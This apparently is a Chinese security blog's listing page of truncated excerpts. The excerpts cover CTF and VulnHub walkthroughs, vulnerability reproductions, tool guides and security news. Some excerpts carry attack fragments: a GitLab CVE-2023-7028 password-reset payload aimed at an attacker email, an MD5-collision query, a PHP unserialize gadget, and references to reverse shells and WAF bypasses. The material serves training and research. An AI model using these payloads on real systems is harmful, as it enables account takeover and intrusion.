红队打靶练习:TOMMY BOY: 1

目录信息收集 1、arp 2、nmap 3、nikto 4、whatweb WEB robots.txt get flag1 get flag2 FTP登录文件下载更改代理 ffuf爆破 get flag3 crunch密码生成 wpscan 1、密码爆破 2、登录wordpress ssh登录 get flag4 信息收集 get flag5 信息收集 1、arp …

安全防御之备份恢复技术

随着计算机和网络的不断普及，人们更多的通过网络来传递大量信息。在网络环境下，还有各种各样的病毒感染、系统故障、线路故障等，使得数据信息的安全无法得到保障。由于安全风险的动态性，安全不是绝对的，信息系统不可能…

The Planets:Earth

靶机下载 The Planets: Earth ~ VulnHub 信息收集 # nmap -sn 192.168.1.0/24 -oN live.nmap Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:20 CST Nmap scan report for 192.168.1.1 Host is up (0.00036s latency). MAC Address: …

Nessus2024.01.11.1版本

Nessus号称是世界上最流行的漏洞扫描程序，全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件，Nessus可同时在本机或远端上遥控，进行系统的漏洞分析扫描…

免费简单好用的 webshell 在线检测：支持 php、jsp、asp等多格式文件

话不多说，直接上图上链接：https://rivers.chaitin.cn/?share3d4f2e8aaec211eea5550242c0a8170c 还是比较好用的，支持 PHP、JSP 文件 webshell 检测，看官方解释文档，引擎使用静态文本特征、骨架哈希、静态语义分析、动…

平安南京，“警”彩无限！聚铭网络精彩亮相南京公安首届“警营开放周”盛典

为迎接第四个“中国人民警察节”的到来，1月6日—10日，南京市公安局在南京国际博览中心6号馆举办了首届“警营开放周”活动，向广大市民群众全面展现平安南京建设成果。期间，便携式聚铭网络脆弱性扫描系统等一批信息化黑科技装备精彩…

深入了解网络流量清洗--使用免费的雷池社区版进行防护

随着网络攻击日益复杂，企业面临的网络安全挑战也在不断增加。在这个背景下，网络流量清洗成为了确保企业网络安全的关键技术。本文将探讨雷池社区版如何通过网络流量清洗技术，帮助企业有效应对网络威胁。 ![] 网络流量清洗的重要性&#x…

【漏洞复现】傲盾信息安全管理系统前台 sichuan_login 远程命令执行

漏洞描述傲盾信息安全管理系统前台 sichuan_login 接口存在远程命令执行漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算…

易安联参与制定的《面向云计算的零信任体系》行业标准即将实施

中华人民共和国工业和信息化部公告2023年第38号文件正式发布行业标准：YD/T 4598.2-2023《面向云计算的零信任体系第2部分：关键能力要求》及YD/T 4598.3-2023《面向云计算的零信任体系第3部分：安全访问服务边缘能力要求》，并于20…

【精选】 dockerFile 使用简介（超详细）

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步…

【漏洞复现】先锋WEB燃气收费系统文件上传漏洞 1day

漏洞描述 /AjaxService/Upload.aspx 存在任意文件上传漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作…

CVE-2023-49070：Apache Ofbiz XML-RPC远程命令执行漏洞复现[附POC]

文章目录 Apache Ofbiz XML-RPC 远程命令执行漏洞复现（CVE-2023-49070） [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现0x06 修复建议参考链接Apache Ofbiz XML-RPC 远程命令执行漏洞复现（CVE-2023-49070） [附POC] …

Python武器库开发-武器库篇之Whois信息收集模块化(四十五)

Python武器库开发-武器库篇之Whois信息收集模块化(四十五) 我们在进行渗透的时候，需要进行全面的信息收集，除了主动信息收集之外，我们还经常会进行被动信息收集，Whois信息收集就是其中的一种,我们可以利用一些网站进行Whois信息收…

2024年江苏省信息安全管理与评估理论题题库（单选120题，多选40题）

2024年江苏省信息安全管理与评估理论题题库（单选120题，多选40题）因各方面原因，无法公开发布，只能设为vip文章，有需要的小伙伴可以看看。单选题 PGP是一个基于下列哪个公钥加密体系的邮件加密软件？（）A.RSA B.Kerberos C.DES D.IDEA 防火墙通过（）控制来阻塞邮…

【高危】Apache Solr 环境变量信息泄漏漏洞

漏洞描述 Apache Solr 是一款开源的搜索引擎。在 Apache Solr 受影响版本中，由于 Solr Metrics API 默认输出所有未单独配置保护策略的环境变量。在默认无认证或具有 metrics-read 权限的情况下，攻击者可以通过向 /solr/admin/metrics 端点发送恶意请…

使用WAF防御网络上的隐蔽威胁之SSRF攻击

服务器端请求伪造（SSRF）攻击是一种常见的网络安全威胁，它允许攻击者诱使服务器执行恶意请求。与跨站请求伪造（CSRF）相比，SSRF攻击针对的是服务器而不是用户。了解SSRF攻击的工作原理、如何防御它&#xff0…

网安入门15-文件包含（伪协议总结）

php://[输入输出流] 跟**http://**一样，这是php的一个特定的协议格式，统称为伪协议，这是所有伪协议的父类 php:// 可用于以下目的： 读取来自用户输入的数据写入数据到客户端浏览器记录错误信息 php://filter 条件 allow_url…

“朱丹被骗案”引关注，在空白纸上签名会遇到哪些风险？

最近话题 #朱丹被骗案判决书#冲上多个平台热搜主持人朱丹在节目中自曝多年前曾因为一张白纸上的签名被好友骗光了所有的积蓄朱丹借此事提醒大家一定不要在白纸上随便签自己的名字并强调：“希望大家不要步我的后尘” “签名”在现实生活中是无处不在，看似…

2024年最全的白帽黑客学习教程，从0到高手，建议收藏

新手如何通过自学黑客技术成为厉害的白帽黑客？ 我目前虽然算不上顶尖的白帽大佬，但自己在补天挖漏洞也能搞个1万多块钱。给大家分享一下我的学习方法，0基础也能上手学习,如果你能坚持学完，你也能成为厉害的白帽子！ 文…

如何有效构建进攻性的网络安全防护策略

文章目录前言一、进攻性安全策略的价值（一）进攻性安全和防御性安全的区别（二）进攻性安全带来一种新的测试和防御的方法（三）进攻性安全策略也比防御性安全策略更具前瞻性二、进攻性安全策略的类型&#xf…

【网络安全】2024年一个漏洞4w+，网安副业挖SRC漏洞，躺着把钱挣了！

一个漏洞奖励2w，这是真实的嘛！ 作为资深白帽，入行网安这些年也一直在接私活，副业赚的钱几乎是我工资的三倍！看到最近副业挖漏洞的内容非常火爆，我便决定将自己的经验分享出来，带我的粉丝们一起…

【高危】Google Chrome V8 ＜ 120.0.6099.224 越界内存访问漏洞

漏洞描述 Google Chrome V8 是一个由Google开发的开源JavaScript引擎，用于Google Chrome及Chromium中。 Google Chrome 120.0.6099.224版本之前中，当通过runtime-object.cc的DeleteObjectPropertyFast删除对象属性时，可能未能正确处理内存或…

2024 年 1 月安全更新修补了 58 个漏洞（Android ）

谷歌发布了针对 Android 平台 58 个漏洞的补丁，并修复了 Pixel 设备中的 3 个安全漏洞，拉开了 2024 年的序幕。 Android 2024 年 1 月更新的第一部分以 2024 年 1 月 1 日安全补丁级别发布在设备上，解决了框架和系统组件中的 10 个安全漏洞&…

Cacti 监控工具 | 因严重 SQL 注入漏洞而受到攻击

攻击者可以利用该问题访问Cacti数据库中的所有数据；并且，当与先前的漏洞链接时，它会启用 RCE。用于监控网络性能的基于 Web 的 Cacti 开源框架中存在一个严重漏洞，该漏洞为攻击者提供了泄露 Cacti 整个数据库内容的方法&#xf…

GitLab任意用户密码重置漏洞(CVE-2023-7028)

GitLab CVE-2023-7028 POC user[email][]validemail.com&user[email][]attackeremail.com 本文链接： https://www.黑客.wang/wen/47.html

HackTheBox - Medium - Linux - Faculty

Faculty Faculty 是一台中型 Linux 机器，具有 PHP Web 应用程序，该应用程序使用的库容易受到本地文件包含的影响。利用该库中的 LFi 会泄露一个密码，该密码可用于通过 SSH 以名为“gbyolo”的低级用户身份登录。用户“gbyolo”有权作为“dev…

【Web】NSSCTF Round#16 Basic个人wp(全)

出题友好，适合手生复健。目录 ①RCE但是没有完全RCE ②了解过PHP特性吗 ①RCE但是没有完全RCE 上来就是一段md5八股 (string)就是不让用数组了，然后强比较需要md5碰撞 ?md5_1%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc…

HTB-SAU

信息收集 # cat port.nmap # Nmap 7.94 scan initiated Thu Jan 11 19:26:51 2024 as: nmap -sS --min-rate 10000 -p- -oN port.nmap 10.10.11.224 Nmap scan report for 10.10.11.224 (10.10.11.224) Host is up (0.28s latency). Not shown: 65531 closed tcp ports (r…

如何激活数据要素价值

文章目录前言一、数据作为生产要素的背景二、数据作为新型生产要素，是价值创造的重要源泉（一）生产要素是经济活动中的基本要素（二）激活数据要素价值，要从理论上认识数据要素的基本特征（三&…

order by之后的injection(sqllabs第四十六关)

order by相关注入知识这一关的sql语句是利用的order by 根据输入的id不同数据排序不一样可以确定就是order by order by后面无法使用ubion注入（靠找不到） 可以利用后面的参数进行攻击 1）数字没作用考虑布尔类型 rand和select ***都可以 …

网络安全B模块（笔记详解）- nmap扫描渗透测试

nmap扫描渗透测试 1.通过BT5对服务器场景Linux进行TCP同步扫描 (使用工具Nmap，使用参数n，使用必须要使用的参数)，并将该操作使用命令中必须要使用的参数作为Flag提交； Flag：sS 2.通过BT5对服务器场景Linux进行TCP同步扫描 (使用工具Nmap，使用参数n，使用必须要使用的参数…

网络安全工具大全

通用工具工具类型工具地址更新时间内网扫描 https://github.com/shadow1ng/fscan 2022-07-06 哥斯拉Webshell管理 https://github.com/BeichenDream/Godzilla 2021-11-01 ARL 资产侦察灯塔 https://github.com/TophantTechnology/ARL 2022-08-25 aliyun-accesskey-Too…

隧道应用2-netsh端口转发监听Meterpreter

流程介绍： 跳板机 A 和目标靶机 B 是可以互相访问到的，在服务器 A 上可以通过配置 netsh 端口映射访问 B 服务器。如果要拿 B 服务器的权限通常是生成正向后门，使用 kali 的 msf 正向连接B服务器，进而得到 Meterpreter&#xff0c…

黑客（网络/信息安全）技术自学——高效学习

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

【严重】GitLab 以其他用户身份执行 Slack 命令

漏洞描述 GitLab 是由GitLab公司开发的、基于Git的集成软件开发平台。使用 Slack 命令在 Slack 聊天环境中运行常见的 GitLab 操作。 GitLab 受影响版本中，由于配置Slack/Mattermost 集成时，未正确验证用户身份信息，导致攻击者可以使用其他…

12种常见的网络钓鱼

网络钓鱼是一种网络攻击，是指具有恶意动机的攻击者伪装欺骗人们并收集用户名或密码等敏感信息的一系列行为。由于网络钓鱼涉及心理操纵并依赖于人为失误(而不是硬件或软件漏洞)，因此被认定为是一种社会工程攻击。 1. 普通网络钓鱼（群攻&…

[SWPUCTF 2022 新生赛]1z_unserialize

[SWPUCTF 2022 新生赛]1z_unserialize wp 题目代码： <?phpclass lyh{public $url NSSCTF.com;public $lt;public $lly;function __destruct(){$a $this->lt;$a($this->lly);}} unserialize($_POST[nss]); highlight_file(__FILE__);?> 直接将 $a…

【低危】OpenSSL 拒绝服务漏洞

漏洞描述 OpenSSL 是广泛使用的开源加密库。在 OpenSSL 3.0.0 到 3.0.12, 3.1.0 到 3.1.4 和 3.2.0 中 ，使用函数 EVP_PKEY_public_check() 来检查 RSA 公钥的应用程序可能会遇到长时间延迟。如果检查的密钥是从不可信任的来源获取的，这可能会导致拒绝…

红队打靶练习:NULLBYTE: 1

目录信息收集 1、arp 2、nmap 3、nikto 4、whatweb 目录探测 1、dirsearch 2、gobuster WEB web信息收集图片信息收集 hydra爆破 sql注入闭合爆库爆表爆列爆字段 hashcat SSH登录提权信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan…

WAF攻防相关知识点总结2-代码免杀绕过

WAF的检测除了有对于非正常的流量检测外还对于非正常的数据包特征进行检测以宝塔为例在宝塔的后台可以放置一句话木马的文件宝塔不会对于这个文件进行拦截，但是一旦我们使用菜刀蚁剑等webshell工具去进行连接的时候，数据报中有流量特征就会被拦截 …

网络安全B模块（笔记详解）- 文件包含

文件包含的渗透与加固 1.使用渗透机场景kali中工具扫描服务器，将服务器上 File Inclusion首页概述页中的Flag提交； Flag：iloveu 2.使用渗透机场景windows7访问服务器场景网站中的File Inclusion(local)页面，找到根目录下Flag文件夹下的Flag.txt文件并将其内容提交； Flag：…

网络安全 | 2024年最全的黑客学习教程，从0到高手，建议收藏！

新手如何通过自学黑客技术成为厉害的黑客高手？ 作为一个资深的白帽，平常在补天挖漏洞也能搞个4w。给大家分享一下我的学习方法，0基础也能上手学习,如果你能坚持学完，你也能成为厉害的白帽子！ 一、打好基础一上来…

神器yakit之web fuzzer功能

前言 yakit并不像burp一样单独设置爆破模块，但是yakit也是可以爆破的，并且更好用（个人感觉）。手工测试场景中需要渗透人员对报文进行反复的发送畸形或者特定的payload进行查看服务器的反馈并以此来进行下一步的判断。 Fuzz标签便…

ctfshow反序列化(web254-web266)

目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web254 源码 <?php/* # -*- coding: utf-8 -*- # Author: h1xa # Date: 2020-12-02 17:44:47 # Last Modified by: h1xa # Last Modified time: 2020…

从零开始配置pwn环境：sublime配置并解决pwn脚本报错问题

1.sublime安装 Download - Sublime Text ──(holyeyes㉿kali2023)-[~] └─$ sudo dpkg -i sublime-text_build-4169_amd64.deb [sudo] password for holyeyes: Selecting previously unselected package sublime-text. (Reading database ... 409163 files and directori…

Vulnhub-TECH_SUPP0RT: 1渗透

文章目录一、前言1、靶机ip配置2、渗透目标3、渗透概括开始实战一、信息获取二、使用smb服务获取信息三、密码破解四、获取webshell五、反弹shell六、web配置文件获取信息七、提权一、前言由于在做靶机的时候，涉及到的渗透思路是非常的广泛，所以在写…

Python网络通信-python爬虫基础

Python网络通信 1、requests模块的使用 1.1、安装requests模块 pip install requests打开pycharm 安装成功会提示successfully 1.2、发送GET请求简单请求（以京东举例） # codingutf-8 import requestsurl "http://www.jd.com" # 直接请求 …

2024自学网络安全（黑客）

网络安全涉及攻击和防御两个方面，通常以“红队”、“渗透测试”为攻击视角，以“蓝队”、“安全运营”、“安全运维”为防御视角。在网络安全市场，需求量大且发展相对成熟，入门相对容易。网络安全建立在其他技术基础之上&#xf…

网络安全产品之认识防毒墙

在互联网发展的初期，网络结构相对简单，病毒通常利用操作系统和软件程序的漏洞发起攻击，厂商们针对这些漏洞发布补丁程序。然而，并不是所有终端都能及时更新这些补丁，随着网络安全威胁的不断升级和互联网的普及&#xf…

风二西CTF流量题大集合-刷题笔记|基础题（1）

题目链接：CTF流量题大集合部分题目已包含脚本和解题视频，但更建议自行分析和手搓脚本 01.flag明文 key.pcapng flag{This_is_a_f10g} 02.flag编码 64da5a4a1e024d198dfa307299965b6d.pcapng flag{7FoM2StkhePz} attack_log_analysis.pcap flag{HI…

内网信息收集总结

本机信息查询常用信息本机服务列表 wmic service list brief 本机进程列表 Tasklist /v 浏览器代理信息 reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" RDP端口号（16进制） reg query "…

OSPF基础华为ICT网络赛道

6.1.OSPF协议概述由协议之中OSPF(Open Shortest Path First,开放式最短路径优先)协议是使用场景非常广泛的动态路由协议之一。 OSPF在RFC2328中定义，是一种基于链路状态算法的路由协议。静态路由是由工程师手动配置和维护的路由条目，命令行简单明确…

ctfshow-命令执行(web53-web72)

目录 web53 web54 web55 web56 web57 web58 web59 web60 web61 web62 web63 web64 web65 web66 web67 web68 web69 web70 web71 web72 web53 …

[VulnHub靶机渗透] CTF7

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步…

关于网络安全的 ARP欺骗实验操作

实验设备： Windows server 2008 kali 1. vmware--上面菜单栏--虚拟机--设置--网络--NAT 模式确定靶机与攻击机的连通性（互相能 ping 通） 靶机查看 arp 表（arp -a） 查看攻击机(kali)物理地址（ip addr&…

三、安全工程—物理安全（CISSP）

目录 1.物理安全概述 2.物理安全计划 2.1 物理安全计划—考虑因素 2.2 物理安全—计划大纲

【暗蚊】黑客通过国内下载站传播Mac远控木马攻击活动分析

1.概述近期，安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例，并深入分析了攻击者在网管运维工具上捆绑植入macOS平台远控木马，利用国内非官方下载站发布，以此取得政企机构内部关键主机桥头堡，进行横…

深度了解TCP/IP模型

网络通信是现代社会不可或缺的一部分，而TCP/IP模型作为网络通信的基石，扮演着至关重要的角色。本文将深入探讨TCP/IP模型的概念、结构及其在网络通信中的作用，为读者提供全面的了解。一.TCP/IP模型简介 TCP/IP模型是一个网络通信协议体系&a…

＜网络安全＞《6 脆弱性扫描与管理系统》

1 概念脆弱性扫描与管理系统本质上就是系统漏洞扫描，简称漏扫。根据漏洞规则库（本地漏洞库、ActiveX库、网页木马库、网站代码审计规则库等）为基础，采用深度主机服务探测、Web智能化爬虫、SQL注入状态检测、主机配置检查以及弱…

2023-2024年重庆职业院校技能大赛“信息安全管理与评估”比赛样题

2023 年重庆职业院校技能大赛（高等职业教育） “信息安全管理与评估”样题任务书第一阶段：任务 1 网络平台搭建（50 分）任务 2 网络安全设备配置与防护（250 分） 第二阶段：第一部分网…

文件包含技术总结

开发人员一般会把重复使用的函数写到单个文件中，需要使用某个函数时直接调用此文件，而无需再次编写，这中文件调用的过程一般被称为文件包含。 allow_url_fopen On（是否允许打开远程文件） allow_url_include On&…

【华为 ICT HCIA eNSP 习题汇总】——题目集9

1、缺省情况下，广播网络上 OSPF 协议 Hello 报文发送的周期和无效周期分别为（）。 A、10s，40s B、40s，10s C、30s，20s D、20s，30s 考点：①路由技术原理 ②OSPF 解析：&…

[SWPUCTF 2018]SimplePHP1

打开环境有查看文件跟上传文件，查看文件里面显示没有文件url貌似可以文件读取上传文件里面可以上传文件。先看一下可不可以文件读取 /etc/passwd不能读取，源码提示flag在f1ag.php 看看能不能读取当前的文件， 先把代码摘下来 file.php …

SQL注入：报错注入

SQL注入系列文章：初识SQL注入-CSDN博客 SQL注入：联合查询的三个绕过技巧-CSDN博客目录什么是报错注入？ 报错注入常用的3个函数 UpdateXML ExtractValue Floor rand（随机数） floor（向上取整&…

upload-labs第一二关

前言一关尽量以多种方式进行呈现有更好的更多的欢迎讨论 docker搭建的时候文件夹是会有一点问题的需要进行一下操作出现上图问题可以用这个方法解决解决 Pass-1 方法一这个常规一点用burp上传这个shell是反弹shell（在线生成的） 这个是前端验证…

XCTF：Normal_RSA[WriteUP]

从题目中获取到两个文件 flag.enc内容是通过rsa加密了的密文 pubkey.pem是rsa公钥，加密者利用这个文件对flag原文进行了加密如果对rsa加密算法不了解的可以补一下教学视频数学不好也能听懂的算法 - RSA加密和解密原理和过程_哔哩哔哩_bilibili 使用openssl对公…

SQL注入-sqli-labs-master第一关

实验环境： Nginx.1.15.11 MySQL：5.7.26 实验步骤： 1.第一步： 在id1后加入一个闭合符号，如果报错，再在后面加上 -- 将后面注释掉，如果不报错，则证明为字符型。 http://127.0.0.1/…

如何有效开展网络安全事件调查工作

网络安全事件调查是现代企业网络安全体系建设的关键组成部分。为了防止网络攻击，仅仅关注于安全工具的应用效果远远不够，因为安全事件一直都在发生。安全团队只有充分了解攻击者的行踪和攻击路径，才能更好地防范更多攻击时间的发生。做好网络…

win10自带Edge浏览器提示已有人举报此网站不安全解决方法（亲测有效）

今天是2024年1月29日，Win10系统自带Edge浏览器不知怎么回事，打开网站提示“此网站已被人举报不安全”！ 百度找了好多办法，最终还是找技术专家解决了，一键解决！ Edge浏览器右上角“”-设置-隐私、搜索和服务…

＜网络安全＞《5 网络安全产品之网关》

1 基础概念网关(Gateway)又称网间连接器、协议转换器。网关在网络层以上实现网络互连，是复杂的网络互连设备，仅用于两个高层协议不同的网络互连。网关既可以用于广域网互连，也可以用于局域网互连。网关是一种充当转换重任的计算机系统或…

幻兽帕鲁越玩越卡，内存溢出问题如何解决？

近期幻兽帕鲁游戏大火，在联机组队快乐游玩的同时，玩家们也发现了一些小问题。由于游戏有随机掉落材料的设定，服务器在加载掉落物的过程中很容易会出现掉帧、卡顿的情况。某些玩家甚至在游戏1～2时后就出现服务器崩溃的情况&#xf…

Packet Tracer - Configure and Verify a Site-to-Site IPsec VPN Using CLI

Packet Tracer - 使用命令行界面配置和验证站点到站点IPsec VPN 地址表目标验证整个网络的连通性。配置R1以支持与R3之间的站点到站点IPsec VPN。背景/场景网络拓扑图显示了三个路由器。您的任务是配置R1和R3，以便在各自局域网（LAN&#xff09…

Linux/Doctor

Enumeration nmap 已知目标开放了22,80,8089端口，扫描详细情况如下可以看到对外开放了22,80,8089三个端口 TCP/80 SSTI 访问80端口，有一个infodoctors.htb的电子邮件，点击其他的也没有什么反应，猜测有可能需要域名访问在/et…

全球软件供应链安全指南和法规

软件供应商和用户，都需要对有效抵御软件供应链攻击的要求和法规越来越熟悉。供应链安全继续在网络安全领域受到重点关注，这是有充分理由的：SolarWinds、Log4j、Microsoft和Okta软件供应链攻击等事件，持续影响着头部软件供应商以…

【渗透测试】借助PDF进行XSS漏洞攻击

简介在平时工作渗透测试一个系统时，常常会遇到文件上传功能点，其中大部分会有白名单或者黑名单机制，很难一句话木马上传成功，而PDF则是被忽略的一个点，可以让测试报告更丰富一些。含有XSS的PDF制作步骤 1. 编辑器…

＜网络安全＞《8 入侵检测系统IDS》

1 概念入侵检测系统（intrusion detection system，简称“IDS”）是一种对网络传输进行即时监视，在发现可疑传输时发出警报或者采取主动反应措施的网络安全设备。它与其他网络安全设备的不同之处便在于，IDS是一种积极主…

用Yara对红队工具“打标”

前言: YARA 通常是帮助恶意软件研究人员识别和分类恶意软件样本的工具，它基于文本或二进制模式创建恶意样本的描述规则，每个规则由一组字符串和一个布尔表达式组成，这些表达式决定了它的逻辑。但是这次我们尝试使用 YARA 作为一种扫描工具…

＜网络安全＞《7 网络资产测绘和脆弱性管理系统》

1 概念互联网资产通常大致分为Web类和设备类。Web类包括网站、APP、微信小程序；设备类包括路由器、交换机、网关、防火墙、WAF等。这些信息资产暴露在互联网上的信息包括IP地址、域名、端口、中间件、应用、技术架构等。通常包括且不限于在用、试用和停用的IP地址…

4.php开发-个人博客项目登录验证cookiesession验证码安全

目录 4.php开发-个人博客项目&登录验证&cookie&session&验证码安全知识点本节大纲思路 ——这里以我自己的为例—— cookie验证——————> login1.php-登录后台界面 login_check.php-检查，作为包含文件 add_news.php-后台界面 php…

深信服技术认证“SCSA-S”划重点：基线管理与安全配置

为帮助大家更加系统化地学习网络安全知识，以及更高效地通过深信服安全服务认证工程师考核，深信服特别推出“SCSA-S认证备考秘笈”共十期内容，“考试重点”内容框架，帮助大家快速get重点知识~ 划重点来啦 *点击图片放大展示深信服…

云计算市场分析

目录一、云计算市场概述 1.1 概述二、国外云计算厂商 2.1 亚马逊AWS 2.2 微软AzureAzure 2.3 Apple iCloud 三、国内云计算厂商 3.1 阿里云 3.2 腾讯云 3.3 华为云 3.4 百度智能云一、云计算市场概述 1.1 概述云计算从出现以来，其发展就非常迅速。以…

为什么SSL会握手失败？SSL握手失败原因及解决方案

随着网络安全技术的发展，SSL证书作为网站数据安全的第一道防线，被越来越多的企业选择。SSL证书使用的是SSL协议，而SSL握手是SSL协议当中最重要的一部分。当部署SSL证书时，如果服务器和客户端之间无法建立安全连接，就会…

SSL协议是什么？关于SSL和TLS的常见问题解答

SSL（安全套接字层）及其后继者TLS（传输层安全）是用于在联网计算机之间建立经过身份验证和加密的链接的协议。尽管SSL协议在 1999年已经随着TLS 1.0的发布而被弃用，但我们仍将这些相关技术称为“SSL”或“SSL/TLS”。那么…

防火墙双机热备与NAT Server结合使用

一、NAT Server知识回顾 NAT配置之目的NAT详解https://blog.csdn.net/Mario_Ti/article/details/135175030?spm1001.2014.3001.5502 二、NAT Server公网地址与虚拟IP地址不在同一网段 1、分析过程按照双机热备的配置方式开启双机热备之主备模式，在FW1即主用设备…

＜网络安全＞《12 数据库安全审计系统》

1 概念数据库安全审计系统通过对用户访问数据库行为的记录、分析和汇报，来帮助用户事后生成合规报告、事故追根溯源，同时通过大数据搜索技术提供高效查询审计报告，定位事件原因，以便日后查询、分析、过滤，实现加强内…

vulhub靶机activemq环境下的CVE-2015-5254（ActiveMQ 反序列化漏洞）

影响范围 Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0 远程攻击者可以制作一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象，利用该漏洞执行任意代码。漏洞搭建没有特殊要求，请看 (3条消息) vulhub搭建方法_himobrinehacken的博客-CSD…

【学网络安全】kali linux入门及常用简单工具介绍（附工具包）

前言相信很多同学了解到和学习网络安全的时候都听过kali系统，大家都称之为黑客最喜爱的系统，那么什么是kali，初学者用kali能做些什么，我将在本文中做简单的介绍一、kali linux是什么？ Kali Linux 是专门用于渗透测…

《计算机网络简易速速上手小册》第5章：无线网络和移动通信（2024 最新版）

5.1 WLAN的工作原理 - 揭秘无线局域网络的魔法 5.1.1 基础知识无线局域网络（WLAN）允许设备通过无线方式连接到一个局部区域网络，主要基于IEEE 802.11标准，俗称Wi-Fi。WLAN的核心是无线路由器，它不仅充当着网络中各设…

【文件上传WAF绕过】＜?绕过、.htaccess木马、.php绕过

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏…

SQL注入：sqli-labs靶场通关（1-37关）

SQL注入系列文章： 初识SQL注入-CSDN博客 SQL注入：联合查询的三个绕过技巧-CSDN博客 SQL注入：报错注入-CSDN博客 SQL注入：盲注-CSDN博客 SQL注入：二次注入-CSDN博客 SQL注入：order by注入-CSDN博客 …

c#的反汇编对抗

文章目录前记nim攻防基础FFI内存加载加解密、编码后记C#类型转换表nim基础前记随便编写一个c#调用winapi并用vs生成dll,同时用csc生成exe using System; using System.Runtime.InteropServices; namespace coleak {class winfun{[DllImport("User32.dll")]publ…

《计算机网络简易速速上手小册》第1章：计算机网络技术基础（2024 最新版）

文章目录 1.1 OSI 模型简介 - 深入探究1.1.1 基础知识1.1.2 重点案例：构建简易 HTTP 服务器1.1.3 拓展案例1：网络层数据包捕获1.1.4 拓展案例2：传输层 TCP 连接 1.2 TCP/IP 协议栈 - 深入探究1.2.1 基础知识1.2.2 重点案例：使用 P…

第六十一天服务攻防-中间件安全CVE复现K8SDockerJettyWebsphere

第61天服务攻防-中间件安全&CVE复现&K8S&Docker&Jetty&Websphere 知识点： 中间件及框架列表： lIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins, GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Sprng,Fl…

[SWPUCTF 2021 新生赛]ez_unserialize

根据下面的user_agent和Disallow可以判断这个是在robots.txt 我们看的出来这是一个反序列化需要我们adminadmin passwdctf construct 构造方法，当一个对象被创建时调用此方法，不过unserialize()时却不会被调用 destruct 析构方法，PHP将在对象…

基于IATF思想构建网络安全治理体系

文章目录前言一、企业网络安全现状（一）防御碎片化。（二）常见网络安全问题频发。（三）安全意识教育难度大。二、“纵深防御”式综合治理体系建设方案（一）三个核心要素（二）四个保障领域1、网络和基础设施2、区域边界3、计算环境4、支撑性基础设施总结前言近年来，国家…

红队打靶练习:INFOSEC PREP: OSCP

目录信息收集 1、arp 2、nmap WEB 信息收集 wpscan dirsearch ssh登录提权信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.110.128 Starting arp-scan 1.10.0 with 256 ho…

XCTF：warmup[WriteUP]

CtrlU查看页面源码 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><meta http-equiv"X-UA-Compatible&q…

【复现】WordPress html5-video-player SQL 注入漏洞_39

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述在WordPress中播放各种视频文件。一个简单，可访问，易于使用和完全可定制的视频播放器，适用于所…

【Web】CVE-2021-22448 Log4j RCE漏洞学习

目录复现流程漏洞原理复现流程启动HTTP->启动LDAP->执行Log4j vps起个http服务,放好Exploit.class这个恶意字节码 LDAPRefServer作为恶意LDAP服务器 import java.net.InetAddress; import java.net.MalformedURLException; import java.net.URL; import javax.ne…

红队渗透靶机:TIKI: 1

目录信息收集 1、arp 2、nmap 3、nikto 4、whatweb 目录探测 1、dirsearch 2、gobuster WEB web信息收集 searchsploit cms信息收集 ssh登录提权信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:2…

【复现】智慧园区综合管理平台文件上传漏洞_40

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述智慧园区管理平台基于GISBIM的云平台数据中心和物联网技术为核心，将各项基础设施连接成一个有机的整体，通…

《Python 网络爬虫简易速速上手小册》第8章：分布式爬虫设计（2024 最新版）

